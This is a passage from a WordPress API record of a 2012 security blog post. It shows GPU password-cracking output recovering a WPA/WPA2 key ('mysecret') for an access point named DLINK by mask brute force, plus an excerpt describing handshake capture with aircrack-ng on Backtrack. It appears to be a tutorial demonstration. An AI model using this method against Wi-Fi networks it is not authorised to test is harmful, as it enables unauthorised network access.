\/>\nPassword lengths range: <span class=\"nu0\">8<\/span> - <span class=\"nu0\">15<\/span><br \/>\nPlatform: AMD compatible platform found<br \/>\nWatchdog: Temperature limit <span class=\"kw1\">set<\/span> to 90c<br \/>\nDevice <span class=\"co0\">#1: Cayman, 2048MB, 0Mhz, 22MCU<\/span><br \/>\nDevice <span class=\"co0\">#1: Allocating 26MB host-memory<\/span><br \/>\nDevice <span class=\"co0\">#1: Kernel .\/kernels\/4098\/m2500.Cayman.64.kernel (1483607 bytes)<\/span><br \/>\nDLINK:mysecret<br \/>\nStatus.......: Cracked<br \/>\nInput.Mode...: Mask <span class=\"br0\">&#40;<\/span>?<span class=\"nu0\">1<\/span>?<span class=\"nu0\">1<\/span>?<span class=\"nu0\">1<\/span>?<span class=\"nu0\">1<\/span>?<span class=\"nu0\">1<\/span>?<span class=\"nu0\">1<\/span>?<span class=\"nu0\">1<\/span>?<span class=\"nu0\">1<\/span><span class=\"br0\">&#41;<\/span><br \/>\nHash.Target..: DLINK<br \/>\nHash.Type....: WPA<span class=\"sy0\">\/<\/span>WPA2<br \/>\nTime.Running.: <span class=\"nu0\">1<\/span> min, <span class=\"nu0\">1<\/span> sec<br \/>\nTime.Util....: 61012.9ms<span class=\"sy0\">\/<\/span>1027.7ms Real<span class=\"sy0\">\/<\/span>CPU, <span class=\"nu0\">1.7<\/span><span class=\"sy0\">%<\/span> idle<br \/>\nSpeed........: &nbsp; &nbsp;<span class=\"nu0\">70893<\/span> c<span class=\"sy0\">\/<\/span>s Real, &nbsp; &nbsp;<span class=\"nu0\">73327<\/span> c<span class=\"sy0\">\/<\/span>s GPU<br \/>\nRecovered....: <span class=\"nu0\">1<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">1<\/span> Digests, <span class=\"nu0\">1<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">1<\/span> Salts<br \/>\nProgress.....: <span class=\"nu0\">4325376<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">5764801<\/span> <span class=\"br0\">&#40;<\/span><span class=\"nu0\">75.03<\/span><span class=\"sy0\">%<\/span><span class=\"br0\">&#41;<\/span><br \/>\nRejected.....: <span class=\"nu0\">0<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">4325376<\/span> <span class=\"br0\">&#40;<\/span><span class=\"nu0\">0.00<\/span><span class=\"sy0\">%<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<span class=\"co4\">HW.Monitor.#<\/span><span class=\"nu0\">1<\/span>: <span class=\"nu0\">84<\/span><span class=\"sy0\">%<\/span> GPU, 73c Temp<br \/>\nStarted: Fri Mar <span class=\"nu0\">23<\/span> <span class=\"nu0\">18<\/span>:<span class=\"nu0\">37<\/span>:<span class=\"nu0\">12<\/span> <span class=\"nu0\">2012<\/span><br \/>\nStopped: Fri Mar <span class=\"nu0\">23<\/span> <span class=\"nu0\">18<\/span>:<span class=\"nu0\">38<\/span>:<span class=\"nu0\">14<\/span> <span class=\"nu0\">2012<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Bingo, brute forcing worked (albeit with a rather restricted character set!)<\/p>\n","protected":false},"excerpt":{"rendered":"<p>We need to capture the WPA 4 way handshake in order to perform an offline GPU attack. For this demo we&#8217;ll be using an Alfa AWUS036H wireless card under Backtrack 5 R2 64bit. Now I could go in depth about capturing the WPA handshake manually using aircrack-ng but it has been covered in full in [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[28,194,182,187,186,196,195,23,35],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/504"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=504"}],"version-history":[{"count":4,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/504\/revisions"}],"predecessor-version":[{"id":508,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/504\/revisions\/508"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=504"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/categories?post=504"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=504"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}